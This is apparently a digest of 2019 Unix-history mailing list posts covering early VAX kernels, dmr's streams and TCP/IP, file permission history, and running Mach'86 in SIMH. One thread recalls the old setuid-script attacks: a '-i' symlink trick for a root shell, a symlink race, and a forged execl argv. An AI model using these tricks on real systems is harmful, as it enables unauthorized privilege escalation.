The trouble is that Reiser worked in a different group
from the original UNIX crowd, and his management didn't
think his time well spent on that work, so it never got
released.
I remember asking, either during my interview at the Labs
or after I started work there, why the 4.1 kernel had been
chosen instead of Reiser's. It had to do with maintainability:
there were already people who could come in and hack on the
Berkeley system, as well as more using it and maintaining it,
whereas Reiser's system had become a unicorn. Nobody in
1127 wanted to maintain a VM system or anything much close
to the VAX hardware. So the decision was to stick with a
kernel for which someone else would do those things.
Once I'd been there for a year or so and settled in, I found
that I was actually looking after all that stuff, because I
was really interested in it. (Which seemed to delight a lot
of people.) Would we have ended up using Reiser's kernel had
I been there a couple of years earlier? I don't know.
It is in any case a shame that jfr's code never saw the light
of day. I really hope someone can find it on an old tape
somewhere and we can get it into the archive, if only because
I'd love to look at it.
Norman Wilson
Toronto ON
> From: Steve Simon
> i went for a student placement there but didnt get it - i guess my long
> hair (then) didn't fit as the interview seemed good.
Maybe you seemed too honest! :-)
Noel
I don't remember from where I got the scheme, so it might be general,
DigitalUnix, or HP-UX related. Checking the "HP 9000 networking XTI
programmer's guide" from 1995 there's no diagram.
The application which was initially developed on a SystemV derived
UNIX the Computer division of Philips Electronics had bought, used
TLI. Taken over by DEC we moved to SCO UNIX still using TLI, moving to
XLI on Alpha/Digital Unix.
The nice thing of TLI/XLI is the poll(). A multi-client server can
check a list of file descriptors AND indicate a timeout value for the
poll(). Like in
ret_cd = poll(tep->CEPlist, tep->CEPnumb, timeout);
BTW putting in a bit of OSI, on SCO UNIX I use a DEC package which
offers a TLI interface to an OSI TP4/IP stack. Even worked using X.25
as WAN. OSI TP4 and NetBIOS originally bought from Retix.
>Date: Sat, 31 Aug 2019 11:41:40 -0400
>From: Clem Cole <clemc(a)ccc.com>
>To: Rudi Blom <rudi.j.blom(a)gmail.com>
>Cc: tuhs <tuhs(a)minnie.tuhs.org>
>Subject: Re: [TUHS] dmr streams & networking [was: Re: If not Linux,then what?]
>Message-ID:
> <CAC20D2MJPFoU6r73U9GDaqG+Q7vpH3T7CiDNjgN3D2uyuAJgLQ(a)mail.gmail.com>
>Content-Type: text/plain; charset="utf-8"
>
>It's the Mentant implementation that HP originally bought. At LCC we had
>to hacked on it a bit when we put Transparent Network Computing (TNC) stuff
>in HP-UX [we had full process migration working BTW -- A real shame that
>never shipped].
>On Sat, Aug 31, 2019 at 5:44 AM Rudi Blom <rudi.j.blom(a)gmail.com> wrote:
>> Whenever I hear UNIX, networking and streams I have to think about this
>> scheme.
>>
>> Still using this, even on HP-UX 11.31 on Itanium rx-servers
>>
>> Cheers,
>> uncle rubl
On 8/28/19, Clem Cole <clemc(a)ccc.com> wrote:
> On Wed, Aug 28, 2019 at 2:46 AM Peter Jeremy <peter(a)rulingia.com> wrote:
>
> Tru64 talked to DECnet Phase X (I don't remember which one, maybe 4 or 5),
> which had become an ISO/OSI stack by that point for political reasons
> inside of Digital (the OSI vs TCP war reminded me of the Pascal vs C and
> VMS vs UNIX wars - all very silly in retrospect, but I guess it was really
> about who got which $s for development).
It was DECnet Phase V that was based on the ISO/OSI stack. IIRC, at
the time the European telcos were pushing OSI, it had become an ISO
standard, etc. etc. It was also pretty easy to compatibly slide the
legacy proprietary DECnet Phase IV adaptive routing and virtual
circuit layers into the OSI stack.
TCP won the war, of course. The risk with international standards
fashioned out of whole cloth by a committee (as opposed to being a
regularization of existing practice) is that the marketplace may
choose to ignore the "standard". OSI and the Ada programming language
are cases in point.
-Paul W.
https://linux.slashdot.org/story/19/08/26/0051234/celebrating-the-28th-anni…
Leaving licensing and copyright issues out of this mental exercise, what
would we have now if it wasn't for Linux? Not what you'd WANT it to be,
although that can add to the discussion, but what WOULD it be?
I'm not asking as a proponent of Linux. If anything, I was dragged
kicking and screaming into the current day and have begrudgingly ceded
my server space to Linux.
But if not for Linux, would it be BSD? A System V variant? Or (the
horror) Windows NT?
I do understand that this has been discussed on the list before. I
think, however, it would make a good late-summer exercise. Or late
winter depending on where you are :)
art k.
hi
the other early vm system not mentioned yet is the one Charles Forsyth wrote at the university of york for sunos. i never used it as i was learning v7 on an interdata 30 miles away at the time but i read his excellent paper on it.
-Steve
Whenever I hear UNIX, networking and streams I have to think about this scheme.
Still using this, even on HP-UX 11.31 on Itanium rx-servers
Cheers,
uncle rubl
Check out "Setting Up a Research UNIX System" by Norman Wilson. troff
sources are in v10.
====
But that assumes you're being given a root image to copy
to the disk initially, no? We never made a general-purpose
distribution tape; we just made one-off snapshots when someone
wanted a copy of the system in the 10/e era.
Is there a binary root image in Warren's archive? I forget.
Norman Wilson
Toronto ON
(where the weather feels like NJ these days, dammit)
wow, systime.
i went for a student placement there but didnt get it - i guess my long hair (then) didn't fit as the interview seemed good.
i had a mate who was working late on the day the combined uk police and CIA (it was said) arrived to shut them down, and tell them they ARE being taken over by CDC. the crime was selling systime re-badged vaxes to the ussr at the height of the cold war. seem odd now that they thought they could get away with it.
exciting times.
-Steve
> Doug McIlroy <doug(a)cs.dartmouth.edu> wrote:
>
>>
>>> How long was research running on a PDP-11 and when did they move to a VAX?
>>
>> London and Reiser had ported Unix to the VAX, replete with virtual memory, in 1978. By the time v7 was released (1979), Vaxen had become the workhorse machines in Research.
>>
>> Doug
>
> So, what's the story on why the London/Reiser port didn't get adapted
> back by Research, and they ended up starting from 4.1 BSD?
>
> Thanks,
>
> Arnold
Sorry, what I said about London/Reiser is true, but not the whole story. L/R didn't have demand paging; BSD did.
Doug
> How long was research running on a PDP-11 and when did they move to a VAX?
London and Reiser had ported Unix to the VAX, replete with virtual memory, in 1978. By the time v7 was released (1979), Vaxen had become the workhorse machines in Research.
Doug
Gentlefolk,
Does anyone have an original copy of the Lions text. All I have is the new
printed version and my nth generation photocopy from 1975. There is
another 50th event occurring a few weeks that would love to be able to
borrow a copy for an artifact display. Reply to me off-list if you can
help.
Clem
On 8/28/19, Clem Cole <clemc(a)ccc.com> wrote:
>
> So, I think the MIPS product was a holding pattern while DEC got it's
> strategy together. Alpha would really show up until later (I would leave
> LCC and go to DEC to be apart if that). Also note Alpha was brought
> up/debugged on Ultrix and of course, Prism sort of had Ultrix on it. But
> I think using the MIPS chip keep them in the game, when Vax was dying and
> RISC was the word on the street.
I was in DEC's compiler development team at the time, working on the
new GEM common back end, and this matches my recollection. The
original plan was for GEM to be the successor to the VAX Code
Generator (VCG, the common back end used by DEC's PL/I, Ada, C/C++ and
a few other compilers on VAX/VMS) and its first target was the VMS
personality module Prism's OS, Mica. Prism was close to delivering
silicon when it was cancelled in favor of Alpha. DEC's MIPS-based
products were done as a stopgap until Alpha was ready. The GEM group
implemented a MIPS code generator. I don't recall whether we actually
shipped any GEM-based products on the MIPS/Ultrix platform. GEM
focused on Alpha (on VMS, Unix, and Windows host and target platforms)
shortly thereafter.
-Paul W.
> I find it hard to believe what you remember Dennis saying. The point of
> dmr's streams was to support networking research in the lab and avoid the
> myriad bugs of the mpx interface by stepping around them completely.
>
> Perhaps it's out of context.
>
> -rob
> I could be wrong but that's my memory. What he told me was streams was
> for line disciplines for tty drivers. That's what I know but you were
> there, I was not. I'm pretty confused because what Dennis said to me
> was that he did not think streams would work for networking, he thought
> they made sense for a stream but not for a networking connection because
> that had multiple connections coming up through a stream.
There is some contemporary material that gives a bit of context. The quotes are a bit contradictory and perhaps reflect evolving views.
[1]
The original dmr paper (1984) on streams (http://cm.bell-labs.co/who/dmr/st.html) seems to support the no networking view, focussing on terminal handling in its discussion. Also, near the end it says: "Streams are linear connections; by themselves, they support no notion of multiplexing, fan-in or fan-out. [...] It seems likely that a general multiplexing mechanism could help in both cases, but again, I do not yet know how to design it.” This seems to exclude usage for networking, which is typically multiplexed.
[2]
However, now that the V8 sources are available it is clear that the streams mechanism was used (by dmr?) to implement TCP/IP networking. He explains how that tallies with the above quote on multiplexing in a 1985 usenet post: https://groups.google.com/forum/#!topicsearchin/net.unix-wizards/subject$3A…
The config files in the surviving TUHS V8 source tree actually match with the setup that dmr described in the penultimate paragraph.
If the post by dmr does not immediately appear, click on the 8-10-85 post by 'd...(a)dutoit.xn--uucp-y96a to make it fold out. For ease of reference, I’m including the message text below.
<quote>
Steven J. Langdon claimed that without multiplexing one couldn't
do a proper kernel-resident version of TCP/IP in the V8 stream context.
Here's how it's done.
It is still true in our system that stream multiplexing does not occur,
in the sense that every stream connection has (from the point of view
of the formal data structures) exactly two ends, one at a user process,
and the other at a device or another process. However, this has, in
practice, not turned out to be a problem. Say you have a hardware
device that hands you packets with a channel (or socket) number buried
inside in some complicated format. The general scheme to handle the
situation uses both a line discipline (stream filter module) and
associated code that, to the system, looks like a stream device driver
with several minor devices; these have entries in /dev.
A watchdog process opens the underlying real device, and pushes
the stream module. Arriving packets from the real device
are passed to this module, where they are analyzed,
and then given to the appropriate associated pseudo-device.
Likewise, messages written on the pseudo-device are shunted over to
the line discipline, where they are encoded appropriately and sent
to the real device. This is where the multiplexing-demultiplexing
occurs; formally, it is outside of the stream structure, because
the data-passing doesn't follow the forward and backward links
of the stream modules. However, the interfaces of the combined
larger module obey stream rules.
For example, IP works this way: The IP line discipline looks at the
type field of data arriving from the device, and determines whether the
packet is TCP or UDP or ARP or whatever, and shunts it off to the
stream associated with /dev/ip6 or /dev/ip17 or whatever the numbers
are.
TCP, of course, is multiplexed as well. So there is a TCP line
discipline, and a bunch of TCP devices; a watchdog process opens
/dev/ip6, and pushes the TCP line discipline; then the TCP packets it
gets are parcelled out to the appropriate /dev/tcpXX device. Each TCP
device looks like the end of a stream, and may, of course, have other
modules (e.g. tty processor) inserted in this stream.
UDP sits on top of IP in the same way.
This example is complicated, because (TCP,UDP)/IP is. However, it
works well. In particular, the underlying real device can be either an
ethernet or our own Datakit network; the software doesn't care. For
example, from my machine, I can type "rlogin purdy" and connect to a
Sequent machine running 4.2; the TCP connection goes over Datakit to
machine "research" where it is gatewayed to a local ethernet that purdy
is connected to.
A further generalization (that we haven't made) is in principle easy:
there can be protocol suites other than IP on an Ethernet cable. So
there could be another layer to separate IP from XNS from Chaosnet, etc.
Dennis Ritchie
</quote>
Maybe the subtle notion expressed as "formally, it is outside of the stream structure, because the data-passing doesn't follow the forward and backward links of the stream modules. However, the interfaces of the combined larger module obey stream rules” explains how dmr could talk about streams as being just suitable for line disciplines without meaning to say that they did not have good use in networking.
Paul
John Steinhart:
Just curious - am doing a cross-country road trip with my kid and saw a
Wisconsin dev null license plate. Didn't get a look at the driver.
=====
It's in ken/mem.c in Fourth Edition, dmr/mem.c in Fifth and Sixth.
Norman (no sheds) Wilson
Toronto ON
Just curious - am doing a cross-country road trip with my kid and saw a
Wisconsin dev null license plate. Didn't get a look at the driver.
Does it belong to anyone on this list?
Jon
This is probably the place to ask:
I understand why the shell builtin "exec" is the same as the syscall exec()
in the sense of "replace this process with that one." But why is it also
the way to redirect filehandles in the current shell? (That is, why isn't
the redirection named something else?)
Adam
On Fri, Aug 02, 2019 at 06:49:19PM -0400, Jim Carpenter wrote:
> On 8/2/19 4:14 PM, Warren Toomey wrote:
> > Hi all, I'm chasing the Youtube video of the PDP-7 at Bell Labs where
> > people are using it to draw circuit schematics.
>
> A Bell Labs video? The only Bell Labs video I remember seeing that had
> someone doing circuit schematics had it being done on a PDP-5. The -7 was
> shown later doing music stuff. (That's the -7 that I thought maybe Unix
> started life on.)
Thanks Jim, Is it this one?
https://www.youtube.com/watch?v=iwVu2BWLZqA
They mention a Graphics-1 device, so maybe I'm getting this confused
with the PDP-7 and the Graphics-2.
Cheers, Warren
Oops. Didn't think it through: the problem is argv[1],
passed as the name of the script being executed, not
argv[0]. Disregard my previous execl(...).
A related problem is the inherent race condition:
If you do
ln -s /bin/setuidscript .
./setuidscript
./setuidscript is opened twice: once when the kernel
reads it and finds #! as magic number and execs the
interpreter, a second time when the interpreter opens
./setuidscript. If you meanwhile run something that
swoops in in the background and replaces ./setuidscript
with malicious instructions for the interpreter, you
win.
I remember managing to do this myself at one point in
the latter part of the 1980s. That was when I fell
out of love with setuid interpreter scripts.
It looks like we didn't disable the danger in the
Research kernel, though. I don't remember why not.
Norman Wilson
Toronto ON
> Date: Fri, 2 Aug 2019 09:28:18 -0400
> From: Clem Cole <clemc(a)ccc.com>
> To: Aharon Robbins <arnold(a)skeeve.com>, Doug McIlroy <doug(a)cs.dartmouth.edu>
> Cc: The Eunuchs Hysterical Society <tuhs(a)tuhs.org>
> Subject: Re: [TUHS] Additional groups and additional directory permissions
>
> The best I can tell/remember is that groups went through 4 phases:
> 1.) No groups (earliest UNIX) [ I personally never used this except in the
> V0 retrocomputing]
> 2.) First group implementation (Thompson) [My first UNIX introduction was
> with this implementation]
> 3.) PWB 1.0 (Mashey version) [then saw this post PWB]
> 4.) BSD 4.2 (wnj version) [and lived this transistion]
>
> Each was a little different in semantics.
>
> As Doug mentioned, many sites (like Research) really did not need much and
> groups were really not used that widely. Thompson added something like
> the Project number of TOPS and some earlier systems. Truth is, it did not
> help much IMO. It was useful for grouping things like the binaries and
> keeping some more privileged programs from having to be setuid root.
>
> Mashey added features in PWB, primarily because of the RJE/Front end to the
> Mainframes and the need to have better protections/collections of certain
> items. But they still were much more like the DEC PPN, were you were
> running as a single group (i.e. the tuple UID/GID). This lasted a pretty
> long time, as it worked reasonably well for larger academic systems, where
> you had a user and were assigned a group, say for a course or class, you
> might be talking. If you looked at big 4.1 BSN Vaxen like at Purdue/Penn
> State, *etc.*, that how they were admin'd. But as Doug said, if you were
> still a small site, the use of groups was still pretty shallow.
>
> But, as part of the CSRG support for DARPA, there was a push from the
> community to have a list of groups that a user could be a part and you
> carried that list around in a more general manner. The big sites, in
> particular, were pushing for this because they were using groups as a major
> feature. wnj implemented same and it would go out widely in 4.2, although
> >>by memory<< that was in 4.1B or 4.1C first. It's possible Robert Elz
> may have brought that to Bill with his quota changes, but frankly I've
> forgotten. There was a lot of work being done to the FS at that point,
> much less Kirk's rewrite.
>
> But as UNIX went back to workstations, the need for a more general group
> system dropped away until the advent widely used distributed file systems
> like CMU's AFS and Sun's NFS. Then the concept of a user being in more
> than one group became much more de rigeur even on a small machine.
>
> Clem
Late to answer...
As far as I remember, Clem's description is correct. The filesystem
itself stores only one owner and one group ID. When checking access
to the file, the file owner is checked to see if the user ID matches.
If so, then the owner permissions are applied. If not then the group
array associated with the user is used to decide if the group of the
file matches one of the groups of which the user is a member and if
so the group permissions apply. Otherwise the other permissions are
used.
In BSD, the group assigned to the file is assigned from the group of
the directory in which it is created. The setgid flag can be set only
if that group is a member of the user's group array. The user can only
change the group ID to one that appears in their group array.
Until multiple group sets were added to System V, the group of the
file was taken from the gid assigned to the user at login.
Kirk McKusick
Do, or did, anything other than Linux use a concept of an initramfs /
initrd to create a pre-(main)-init initialization environment to prepare
the system to execute the (main)-init process?
--
Grant. . . .
unix || die
Greetings,
I was wondering if there were any early versions of MERT available?
Reading different sources, it appears that MERT was a real time kernel that
used EMT traps to implement unix system calls (from around V4 or V5 given
the timelines) on top of a real time executive (though some sources seem to
imply it was a derivative of V4, most disagree).
I see this in our archives
https://wiki.tuhs.org/doku.php?id=misc:snippets:mert1 which is quite handy
for discover its (and other early) unix lineages for a talk I'm doing in
about a month. Now that we have sources, I go back and double check the
recollections of things like this to see if version numbers were right,
etc. But I can't do that with MERT at all. I can find the Bell Systems
Technical Journal for Unix that has a brief article on it, but no sources
to double check.
So I thought I'd ask here if we have any MERT artifacts I can look at that
have escaped my casual browsing of the archive. So far I've just found an
email from Kevin Bowling on the topic from last month with no replies. And
a similar thread from 2002, plus pleading from time to time (I can't tell
if Warren or Noel wants it more :).
I guess the same could be said for CB-UNIX and UNIX/TS, though I see a
USDL/CB_Unix directory in the archive I could look at :).
Warner
On Tue, 6 Aug 2019, Lyndon Nerenberg wrote:
>> Just to extend this thread a bit more, when did the set[ug]id bit start
>> getting turned off if the file was overwritten?
>
> I'm pretty sure that's been the case since the dawn of time.
Hmmm... I have this vague memory of V5 (which I only used for a couple of
months before we got V6) not clearing that bit, but after all these years
my memory is starting to fail me :-(
> It was certainly the case in every System V (release 0 and beyond) I
> worked with, along with many BSDs derivatives (SunOS 3+, Ultrix, etc).
> (And Xenix, which had it's own insanity that I now think selinux is
> trying to inflict on me.)
I've always thought that Xenix was insane to start with... Then again, my
first experience with it was on a 286... Now, when porting Unify, should
I use large memory model here or small memory model? Crazy.
> This has been documented in chown(2) for as long as I can remember, so
> that's a good place to start if you want to dig back through the various
> source trees.
I don't have access to the sources right now, but I'll take your word for
it; it was just a passing thought.
-- Dave
Hello everyone,
My name is Benito Buchheim and I am a computer science student at
Hasso-Plattner-Institute in Germany.
During our Operating Systems Course we came across The Unix Heritage
Society, more specifically Research Unix Version 3, and took a look into
the source code of this version.
The idea arose to try to get this running somehow as a sort of voluntary
task.
So I started digging my way through the available material and quickly
found the "modified_nsys" version by Warren Toomey, which conveniently
contained a very detailed readme file on how to compile and run this
version on a Unix v5 emulator.
Thus, I started cloning the simh Github Repository and built the pdp11
emulator.
After downloading the v5root disk image and figuring out how to use simh
to run it, I had a working Unix v5, but struggled a bit to copy more
than one file onto it using the emulated devices.
In the end, I used a very Hacky way and wrote a short python script
which just runs the emulator and "copy pastes" the folder structure into
the image. I now thought to be ready to start working my way through
Toomey's readme.
Unfortunately already the first command failed quite miserably. I
changed my working directory and ran the first shell script to compile
the kernel, but cc spat out loads of error messages which are not very
detailed. As this is a very early version of c code I am kinda stuck at
this point and running a bit out of ideas on what may have gone wrong.
As there is this mailing list we thought to have a chat with the
experts. Maybe there is somebody who could help or give a hint on how to
get this running on the pdp11 emulator.
I attached my shell script output and the v5 image containing the v3
source code in the /sys/nsys directory.
It can be downloaded here:
https://www.mission-eins.de/runningv3.zip
Thanks a lot and best wishes from a small suburb near Berlin,
Benito Buchheim
> From: Dave Horsfall
> it actually *unlinked* directories
Maybe the application was written by a LISP programmer? :-)
(Not really, of course; it was probably just someone who didn't know much
about Unix. They had a list of system calls, and 'unlink' probably said ' only
works on directories when the caller is root', so...)
Speaking of LISP and GC, it's impressive how GC is not really a big issue any
more. At one point people were even building special CPUs that had hardware
support for GC; now it seems to be a 'solved problem' on ordinary CPUs.
Noel
https://www.youtube.com/watch?v=g3jOJfrOknA
National Inventors Hall of Fame - NIHF
Published on Feb 18, 2019
Bell Labs colleagues Ken Thompson and Dennis Ritchie developed UNIX,
a multi-tasking, multi-user operating system alternative to the batch
processing systems then dominating the computer industry.
Not sure why I hadn't seen this before :)
Cheers, Warren
> From: Alec Muffett
>>> ln -s /bin/scriptname ./-i
>>> "-i" # assuming that "." is already in your path
'scriptname' (above) would have to be a shell script which was SETUID root?
That was part of what I was missing, along with the below.
> The cited filename is passed as argv[1]
I wonder why it passed the link name, instead of the actual filename of the
target (script)? Perhaps to allow one script to have multiple functions,
depending on the name it was called with? But that could have been done with
hard links? (Adding a hard link must require write access, because the link
count in the inode has to be updated? So it would be equally secure as not
having an SUID program with write access.)
Part of the problem is having the kernel involved in starting shell scripts;
convenient in some ways, but V6 etc worked fine without that 'feature'.
Noel
Noel Chiappa:
I wonder why it passed the link name, instead of the actual filename of the
target (script)? Perhaps to allow one script to have multiple functions,
depending on the name it was called with?
====
In fact the latter is still used here and there in standard
system distributions.
But from a security viewpoint it doesn't matter. For
ln -s /bin/scriptname ./-i
substitute
execl("/bin/scriptname", "-i", (char *)0);
If you can execute a program, you can fake its arguments,
including argv[0]. There is no defence.
Norman Wilson
Toronto ON
> From: Alec Muffett
> until someone realised that you could do:
> ln -s /bin/scriptname ./-i
> "-i" # assuming that "." is already in your path
> ...and get a root shell.
I'm clearly not very awake this morning, because I don't understand how this
works. Can you break it down a little? Thanks!
Noel
Is it just me, or did someone actually implement set-uid scripts? I've
proposed some silly things over the decades (my favourite is stty()
working on things other than terminals, and guess what, we got ioctl()
etc) but I have a vague recollection of this...
The trouble is, I've worked with dozens of Unix-based vendors over the
years (some good, some not so much) and so I've lost track of all the
stupidity that I've seen.
ObAnecdote: Just about every Unix vendor went belly-up shortly after I
left them (under various circumstances), because the waste-of-space middle
managers simply did not appreciate the importance of having a Unix guru
on board if you're in the game of selling Unix boxen.
I'd happily name them, but I think the principals are still alive :-)
-- Dave
Read and write permission were common ideas--even part of
the Atlas paging hardware that was described before 1960.
The original concept of time-sharing was to give a virtual
computer to each user. When it became clear that sharing
was an equally important aspect, owner/other permissions
arose. I believe that was the case with Multics.
Owner/other permissions were in PDP-11 Unix from the start.
Group permissions arose from the ferment of daily talk in
the Unix lab. How might the usual protections be extended
to collaborative projects? Ken and Dennis deserve credit
for the final implementation. Yet clean as the idea of groups
was, it has been used only sporadically (in my experience).
Execute permission (much overloaded in Unix) also dates
back to the dawn of paging. One Unix innovation, due to
Dennis, was the suid bit--the only patented feature in
the Research system. It was instantly adopted for
maintaining the Moo (a game now sold under the name
"Master Mind") league standings table.
One trouble with full-blown ACLs as required by NSA's
Orange Book, is obscurity. It is hard (possibly NP-
complete) to analyze the actual security of an ACL
configuration.
A common failing of Unix administration was a proliferation
of suid-root programs, e.g. mail(1). I recall one system
that had a hundred such programs. Sudo provided a way
station between suid and ACLs.
Doug
> From: Arthur Krewat
> there's the setuid bit on directories - otherwise known as the sticky
> bit.
Minor nit; in V6 at least (not sure about later), the 'sticky' bit was a
separate bit from SUID and SGID. (When set on a pure/split object file, it
told the OS to retain the text image on the swap device even when no active
process was using it. Hence the name...)
Noel
Hi all, I'm chasing the Youtube video of the PDP-7 at Bell Labs where
people are using it to draw circuit schematics. This seems to show
the Graphics-2 module that, I believe, was built at the Labs. Can
someone e-mail the URL? I've done some grepping but I haven't found it yet.
Thanks, Warren
Hello Unix enthusiasts.
I'd like to know who or the group of people behind implementing this
filesystem permission system.
Since we are using this system for nearly 40 years and it addresses all the
aspects of the permission matter without any hustle.
I'm inspired to know who/how came up with this theory?
Also if it derived from somewhere else or If there's an origin story about
this, it would be worth to share.
Cheers.
Stephan
--
No When
I was talking about DMERT today and Larry McVoy was wondering if it slipped
out in any fashion.
I believe there were official trainers as well as a production emulator
that ran it on Solaris/SPARC. I have never seen them anywhere. Old phone
phreaks I’m acquainted with had illicit access. Does anyone know if source
or the trainer or emulator are tangible?
I enjoyed the BTSJ on DMERT as much as the Unix articles. Highly recommend
reading.
Regards,
Kevin
Does anyone know where the 386 port from PCC came from?
While trying to build a Tahoe userland for the i386, it seems that everything was built with GCC…
Was there a PCC for the i386 around ’88-90? It seems after the rapid demise of the Tahoe/Harris
HCX-9 that the non Vax/HCX-9 platforms had moved to GCC?
Also anyone know any good test software for LIBC? I’ve been tracing through some
strange issues rebuilding LIBC from Tahoe, where I had to include some bits from
Reno to get diropen to actually work. I would imagine there ought to have been some
platform exercise code to make sure things were actually working instead of say
building as much as you can, and playing rogue for a few hours to make sure
its stable enough.
> BSD[Ii] got in trouble with AT&T for their sales number, which was
> 1-800-ITS-UNIX. I don't know if they ever got officially sued or not.
There was a joke that MIT should have sued them too, for violating their
trademark on ITS.
-- Richard
--
The University of Edinburgh is a charitable body, registered in
Scotland, with registration number SC005336.
>Does anyone have documentation or history for European efforts in the Unix-like operating systems? For example there was Bull’s Chorus which I seem to recall was based on Mach or a competing microkernel (it was a very long time ago and I used it for no mare than about two hours..).
>I am rather saddened by the fact that there is so much about all the Unix (and not only >Unix) history of computing in the USA and so very little in Europe. I wouldn’t even know >where to start, to be honest, all I have as a history is the Italian side from my father and his other mad friends and colleagues in Milan. So little of it is recorded, never mind written down.
In the 80-tisch I worked at Philips Data Systems in Apeldoorn, the
Netherlands. Not in Development, but in System Support. Philips was
working on a System V.3 based UNIX running on Motorola 68000 CPUs in a
P9X00 server. Called MPX as in Multi-Processor UNIX. The Multi part
refers to having an Ethernet, X25 and SDLC board running a tailored
version of the OS to offload the main CPU.
See for example
https://www.cbronline.com/news/better_late_philips_enters_the_uk_unix_marke…https://www.cbronline.com/news/philips_ready_with_68030_models_for_its_p900…
Later Philips moved to i386 with a 'unknown version' based UNIX.
Division was bought by DEC (some say sold off by Philips) in 1991 and
we moved to DEC's choice of SCO UNIX. The 'intelligent comm boards
were ported and still running the separate OS though.
Unfortunately I never had any of that OS type of source and my paper
archive was left behind. Only have some small higher level test stuff
and my mail archive. For a while I was "rudi blom"
<blom(a)kiwi.idca.tds.philips.nl>, later rudi blom"@apd.mts
Nearly all the unixes i used where from the US, but one stands out.
I spent a week or two trying to get my head around Helios which was aimed at parallel systems (transputer). I believe it was French in origin, and wad unix-like at the command line but the shell supported mesh pipelines and other unique ideas.
interesting but hard to manage..
-Steve
For anyone that is interested, there is 2 files on Kirk’s DVD that don’t appear on the CD’s
mach.86-accent
mach.86
The smaller mach.86-accent is a few months newer than the other, and is strictly the kernel. mach.86 contains
stuff like the libraries for mach, bindings for pascal, along with an updated libc, and various binaries to run under
4.3BSD. It appears that the Mach project at that time was pretty much in step with the CSRG release.
Speaking of pascal, the early version of MIG is actually written in pascal. There is quite a #ifdef ACCENT stuff in the code
As well. So the bindings are more than something superficial.
I had a major issue trying to use RA81 disks on SIMH, although switching to RP06’s seemed to have made things a
little more stable, the larger issue seems to have been the async I/O code, and disabling that increased stability
and reduced disk corruption greatly.
Setting up the build involved copying files from the ‘cs’ directory to their respective homes, along with the ‘mach/bin/m*’
commands to the /bin directory. Configuring the kernel is very much like a standard BSD kernel config, however the directory
needs to exist beforehand, and instead of the in path config command run the config command in the local directory.
I have been able to self host a kernel, and build a good portion of world before I realized that the I/O was probably what I was
Fighting and went back and restored the 4.3 tape back onto the HP’s and just re-built the kernel to verify it works. For those
Wanting the command for SIMH it’s simply ‘set noasync’. The XU adapter worked out of the box with a simple:
set xu ena
att xu nat:tcp=42323:10.0.2.15:23
Which allowed me to telnet into the VAX, making things much easier than dealing with the console.
While this kernel does have mentions of multi processor support I haven’t quite figured out what models (if any) are supported
On the VAX, and if SIMH emulates them. While http://www.oboguev.net/vax_mp/ has a very interesting looking multiprocessor VAX
Emulation it’s a fictional model based on the microvax, which I’m pretty sure 4.3BSD/Mach’86 is far too old for.
And for those who like the gratuitious dmesg, this is a self hosted Mach build
loading hp(0,0)boot
Boot
: hp(0,0)vmunix
393480+61408+138472 start 0x1fa5
Vax boot: memory from 0x92000 to 0x800000
Kernel virtual space from 0x80000000 to 0x82000000.
Mach/4.3/2/1 #1: compiled in /usr/mk/MACH on wb2.cs.cmu.edu at Mon Oct 20 12:54:42 1986
physical memory = 8.00 megabytes.
available memory = 5.86 megabytes.
using 408 buffers containing 0.79 megabytes of memory
VAX 11/780, serial#1234(0), hardware ECO level=7(0)
mcr0 at tr1
mcr1 at tr2
uba0 at tr3
zs0 at uba0 csr 172520 vec 224, ipl 15
ts0 at zs0 slave 0
dz0 at uba0 csr 160100 vec 300, ipl 15
de0 at uba0 csr 174510 vec 120, ipl 15
de0: hardware address 08:00:2b:0d:d1:48
mba0 at tr8
hp0 at mba0 drive 0
hp1 at mba0 drive 1
hp2 at mba0 drive 2
hp3 at mba0 drive 7
Changing root device to hp0a
I uploaded my SIMH config, along with the RP06 disk images here: https://sourceforge.net/projects/bsd42/files/4BSD%20under%20Windows/v0.4/Ma…
386BSD was released on this day in 1992, when William and Lynne Jolitz
started the Open Source movement; well, that's what my notes say, and
corrections are welcome (I know that Gilmore likes to take credit for just
about everything).
-- Dave
Many, many thanks to Clem Cole for arranging the 50th Unix Anniversary
celebration in Seattle last Wednesday. It was wonderful to see old
friends again. Most of these folks are still out in the world sharing
their brilliance in various computing facilities. Lots of very special
people still doing wonderful work! Thanks, Clem, for the chance to meet
up with them again!
Deborah
As the last week had a discussion on this list about various VMS+Unix projects from that era, maybe it is a good time to ask the below question again:
For a while I have been searching for a 1982 tech report from CSRG:
"TR/4 (Proposals for the Enhancement of Unix on the Vax)"
This report later evolved into TR/5, the 4.2BSD manual, but I’m specifically looking for TR/4.
The only reference that I have for TR/4 is contained in a 1982 discussion about VMS vs. Unix:
https://tech-insider.org/vms/research/1982/0111.html (seek for message 5854 from Bill Mitchell).
Clutching at straws here, but maybe a copy survived in a box with VMS+Unix materials.
Wbr,
Paul
> From: Adam Thornton
> something designed for single-threaded composible text-filtering
> operations is now running almost all of the world's multithreaded
> user-facing graphical applications, but that's the vagaries of history
> for you.
It's a perfect example of my aphorism, "The hallmark of truly great
architecture is not how well it does the things it was designed to do, but how
well it does things it was never expected to handle."
Noel
Hunting around through my ancient stuff today, I ran across a 5.25"
floppy drive labeled as having old Usenet maps. These may have
historical interest.
First off, I don't recognize the handwriting on the disk. It's not mine.
Does anyone recognize it? (pic attached)
I dug out my AT&T 6300 (XT clone) from the garage and booted it up. The
floppy reads just fine. It has files with .MAP extension, which are
ASCII Usenet maps from 1980 to 1984, and some .BBM files which are ASCII
Usenet backbone maps up to 1987.
There is also a file whose extension is .GRF from 1983 which claims to
be a graphical Usenet map. Does anyone have any idea what GRF is or
what this map might be? I recall Brian Reid having a plotter-based
Usenet geographic map in 84 or 85.
I'd like to copy these files off for posterity. They read on DOS just
fine. Is there a current best practice for copying off files? I would
have guessed I'd need a to use the serial port, but my old PC has DOS
2.11 (not much serial copying software on it) and I don't have anything
live with a serial port anymore. And it might not help with the GRF file.
I took some photos of the screen with the earliest maps (the ones that
fit on one screen.) So it's an option to type things in, at least for
the early ASCII ones.
Thanks,
Mary Ann
... of the pdp7 unix restoration activities. I could find the old unix72
ones at tuhs, but not the unix v0 archives. Can someone point me in the
right direction? A google search or 4 has turned up nothing. Has it been
archived somewhere?
Warner
Well I checked out Kirk’s site, and found out that he has a DVD to go along with the old 4 disc CD-ROM sets:
